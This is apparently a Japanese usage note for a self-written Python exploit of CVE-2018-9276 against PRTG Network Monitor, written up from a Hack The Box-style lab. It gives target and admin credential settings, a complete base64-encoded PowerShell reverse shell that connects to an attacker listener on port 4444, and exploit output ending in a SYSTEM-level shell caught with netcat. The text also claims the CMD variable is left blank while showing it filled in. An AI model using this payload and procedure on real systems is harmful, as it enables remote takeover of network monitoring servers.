
CVE: 2018-9276 向けの Python エクスプロイト
https://www.exploit-db.com/exploits/46527 に基づく
使用方法: スクリプトを手動で編集して、対象のURL、管理者ユーザー名、パスワードを以下のように設定します。
TARGET = "http://10.129.15.52"
USER = "prtgadmin"
PASS = "PrTg@dmin2019"
次に、110行目で実行したい任意のコマンドを挿入します。逆シェルを即座にリスナーに接続するには、revshells.com からBase64エンコードされたリバースシェルを使用することをお勧めします。
注意: スクリプト内のCMD変数は空欄のままにしてありますので、自由にカスタマイズしてください。
CMD = "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AOQAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
フラグなしでスクリプトを実行するだけで、リスナーに接続が返ってくるはずです。
┌──(root㉿user)-[/run/…/user/2024/HTBox/jerry]
└─# python3 CVE-2018-9276.py
[*] Attempting login as: prtgadmin
[+] Successfully logged in
[*] Creating malicious notification...
[+] Notification created. ID: 2019
[*] Triggering notification test...
[+] Payload queued successfully.
[*] Deleting notification 2019...
[+] Cleanup complete.
[*] Exploit cycle finished. Check target.
┌──(root㉿user)-[/home/user]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.93] from (UNKNOWN) [10.129.15.52] 50466
whoami
nt authority\system
PS C:\Windows\system32>
このエクスプロイト用のPythonスクリプトがなかったため、自分で作成してみようと思いました。